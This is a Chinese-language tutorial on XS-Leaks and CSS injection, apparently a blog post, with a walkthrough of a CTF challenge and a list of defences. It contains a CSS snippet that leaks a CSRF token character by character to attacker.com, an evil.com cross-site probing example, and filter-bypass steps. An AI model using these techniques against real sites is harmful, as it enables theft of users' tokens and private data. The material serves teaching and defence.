XS-Leaks与CSS注入攻击原理及实战<\/h1>

1 XS-Leaks概述<\/h2>

1.1 基本概念<\/h3>
XS-Leaks（Cross-Site Leaks）是一种利用Web平台特性进行信息泄露的攻击技术。它本质上属于侧信道攻击，通过观察不同网站间交互过程中产生的副作用来推断敏感信息。<\/p>

1.2 工作原理<\/h3>

浏览器提供了多种跨站点交互机制（如资源加载、导航、消息传递），虽然受到同源策略限制，但XS-Leaks利用这些交互过程中暴露的微小信息差异：<\/p>

网站不能直接访问其他源的数据<\/li>
但可以加载其他源的资源并观察加载结果<\/li>

通过分析资源加载的成功\/失败状态推断信息<\/li> <\/ol>

1.3 典型攻击示例<\/h3>

假设存在以下场景：<\/p>

目标站点：bank.com，提供API端点bank.com\/my_receipt?q=<transaction_type><\/code><\/li>

攻击站点：evil.com<\/li>
<\/ul>
攻击流程：<\/p>

evil.com尝试将bank.com\/my_receipt?q=groceries<\/code>作为脚本加载<\/li>
浏览器自动附加用户cookie（携带身份凭证）<\/li>
如果用户最近购买过杂货，返回HTTP 200，脚本加载成功<\/li>
如果用户未购买，返回HTTP 404，触发错误事件<\/li>
通过监听错误事件并测试不同查询参数，攻击者可推断用户交易历史<\/li>
<\/ol>
1.4 常见攻击向量<\/h3>
目前主流的XS-Leaks攻击技术包括：<\/p>

浏览器API滥用（帧计数、计时攻击）<\/li>
浏览器实现细节和漏洞利用（连接池、typeMustMatch）<\/li>
硬件层面攻击（推测执行）<\/li>
<\/ul>
2 CSS注入攻击<\/h2>
2.1 基本概念<\/h3>
CSS注入是一种在JavaScript被禁用时的替代攻击手法，通过向目标页面注入恶意CSS代码来影响页面渲染并窃取信息。<\/p>
2.2 攻击原理<\/h3>
利用CSS属性选择器匹配特定元素的属性值，通过外部资源加载行为泄露信息：<\/p>
input<\/span>[<\/span>name<\/span>=<\/span>"csrf"<\/span>][<\/span>value<\/span>^=<\/span>"a"<\/span>]<\/span> {
<\/span><\/span>  background-image<\/span>: url(https:\/\/attacker.com\/exfil\/a<\/span>);
<\/span><\/span>}
<\/span><\/span>input<\/span>[<\/span>name<\/span>=<\/span>"csrf"<\/span>][<\/span>value<\/span>^=<\/span>"b"<\/span>]<\/span> {
<\/span><\/span>  background-image<\/span>: url(https:\/\/attacker.com\/exfil\/b<\/span>);
<\/span><\/span>}
<\/span><\/span>\/* 省略其他字符 *\/<\/span>
<\/span><\/span>input<\/span>[<\/span>name<\/span>=<\/span>"csrf"<\/span>][<\/span>value<\/span>^=<\/span>"9"<\/span>]<\/span> {
<\/span><\/span>  background-image<\/span>: url(https:\/\/attacker.com\/exfil\/9<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.3 攻击流程<\/h3>

构造CSS选择器匹配目标元素的属性值模式<\/li>
当属性值匹配时触发外部资源加载<\/li>
通过监听服务器端的请求记录推断属性值<\/li>
特别针对隐藏input元素时需要特殊处理（默认不加载背景）<\/li>
<\/ol>
2.4 实施条件<\/h3>
成功的CSS注入攻击需要满足以下条件：<\/p>

Payload长度<\/strong>：注入点必须支持足够长的CSS payload<\/li>
CSS重新评估<\/strong>：能够对页面进行框架化以触发CSS重新评估<\/li>
外部资源<\/strong>：能够加载外部托管资源（受CSP限制）<\/li>
<\/ol>
3 实战案例：[Asisctf-Quals2025]pure-leak<\/h2>
3.1 环境分析<\/h3>

技术栈：PHP + JavaScript<\/li>
漏洞点：用户输入直接插入HTML（存在注入漏洞）<\/li>
<\/ul>
<?<\/span>php<\/span> echo<\/span> validate<\/span>($_GET["content"<\/span>] ??<\/span> "{{ your_input }}"<\/span>).<\/span>"<\/span>\n<\/span>"<\/span>; ?><\/span>
<\/span><\/span><\/span><\/code><\/pre>
安全限制：设置了CSP策略，禁用[<\/code>和]<\/code>字符<\/li>
<\/ul>
3.2 攻击思路<\/h3>

通过CSS注入窃取管理员token<\/li>
绕过CSP限制和字符过滤<\/li>
利用XS-Leaks技术进行信息推断<\/li>
<\/ol>
3.3 关键技术点<\/h3>
3.3.1 利用PHP Warning进入Quirks Mode<\/h4>
问题<\/strong>：标准模式下要求CSS的Content-Type为text\/css<\/code>，但PHP默认返回text\/html<\/code><\/p>
解决方案<\/strong>：触发PHP Warning使文档进入怪异模式（Quirks Mode）<\/p>

三种触发PHP Warning的方式：

调用未定义函数<\/li>
使用未定义常量<\/li>
函数参数超过最大值<\/li>
<\/ol>
<\/li>
<\/ul>
效果<\/strong>：怪异模式放宽MIME检查，允许同源的非text\/css<\/code>资源被当作CSS加载<\/p>
3.3.2 绕过注释限制<\/h4>
问题<\/strong>：页面中存在\/*<\/code>注释，且过滤了*<\/code>字符，无法使用*\/<\/code>提前闭合<\/p>
解决方案<\/strong>：利用404错误页面进行CSS注入<\/p>

在404页面定义payload<\/li>
使用{}<\/code>清理前缀垃圾内容，确保CSS规则正常解析<\/li>
<\/ul>
3.3.3 替代属性选择器<\/h4>
问题<\/strong>：[<\/code>和]<\/code>字符被过滤，无法使用常规属性选择器<\/p>
解决方案<\/strong>：使用:valid<\/code>伪类和pattern<\/code>属性实现相同效果<\/p>
<input<\/span> pattern<\/span>=<\/span>"正则表达式"<\/span> value<\/span>=<\/span>"用户输入"<\/span>>
<\/span><\/span><\/code><\/pre>
利用CSS伪类选择器：<\/li>
<\/ul>
input<\/span>:valid<\/span> {
<\/span><\/span>  \/* 匹配成功的样式 *\/<\/span>
<\/span><\/span>}
<\/span><\/span>input<\/span>:invalid<\/span> {
<\/span><\/span>  \/* 匹配失败的样式 *\/<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3.3.4 Frame Counting技术<\/h4>
问题<\/strong>：Bot无法直接感知颜色变化<\/p>
解决方案<\/strong>：使用Frame Counting技术进行检测<\/p>

原理：嵌入<embed><\/code>或<object><\/code>会使window.length<\/code>加1<\/li>
隐藏嵌入元素不会增加计数<\/li>
通过CSS控制元素显示\/隐藏来操纵window.length<\/code>值：

匹配成功：隐藏元素 → window.length = 0<\/code><\/li>
匹配失败：显示元素 → window.length = 1<\/code><\/li>
<\/ul>
<\/li>
<\/ul>
3.4 完整攻击流程<\/h3>

触发PHP Warning使文档进入Quirks Mode<\/li>
通过404页面加载CSS注入payload<\/li>
使用pattern<\/code>和:valid<\/code>替代属性选择器<\/li>
利用Frame Counting技术检测匹配结果<\/li>
通过布尔判断逐步推断token值<\/li>
<\/ol>
4 防御措施<\/h2>
4.1 对抗XS-Leaks<\/h3>

使用Cross-Origin Resource Policy（CORP）限制资源加载<\/li>
实施Cross-Origin Opener Policy（COOP）<\/li>
启用Cross-Origin Embedder Policy（COEP）<\/li>
对敏感请求使用CSRF令牌验证<\/li>
<\/ul>
4.2 对抗CSS注入<\/h3>

严格验证和过滤用户输入<\/li>
实施严格的Content Security Policy（CSP）<\/li>
避免将用户输入直接插入HTML文档<\/li>
对敏感数据使用HTTPOnly和Secure标志<\/li>
<\/ul>
5 参考资料<\/h2>

XS-Leaks Wiki: https:\/\/xsleaks.dev\/<\/li>
HackTricks CSS注入: https:\/\/book.hacktricks.xyz\/pentesting-web\/xs-search\/css-injection<\/li>
实战案例分析: https:\/\/blog.arkark.dev\/2025\/09\/08\/asisctf-quals<\/li>
<\/ol>

本文详细介绍了XS-Leaks和CSS注入攻击的原理、技术实现和实战应用，涵盖了从基本概念到高级绕过技术的完整知识体系，为安全研究和防护措施提供了全面参考。<\/p>

XS-Leaks与CSS注入攻击原理及实战<\/h1>

1 XS-Leaks概述<\/h2>

1.1 基本概念<\/h3> XS-Leaks（Cross-Site Leaks）是一种利用Web平台特性进行信息泄露的攻击技术。它本质上属于侧信道攻击，通过观察不同网站间交互过程中产生的副作用来推断敏感信息。<\/p>

2 CSS注入攻击<\/h2>

2.1 基本概念<\/h3> CSS注入是一种在JavaScript被禁用时的替代攻击手法，通过向目标页面注入恶意CSS代码来影响页面渲染并窃取信息。<\/p>

3 实战案例：[Asisctf-Quals2025]pure-leak<\/h2>

3.3 关键技术点<\/h3>

4 防御措施<\/h2>

1.1 基本概念<\/h3>
XS-Leaks（Cross-Site Leaks）是一种利用Web平台特性进行信息泄露的攻击技术。它本质上属于侧信道攻击，通过观察不同网站间交互过程中产生的副作用来推断敏感信息。<\/p>

2.1 基本概念<\/h3>
CSS注入是一种在JavaScript被禁用时的替代攻击手法，通过向目标页面注入恶意CSS代码来影响页面渲染并窃取信息。<\/p>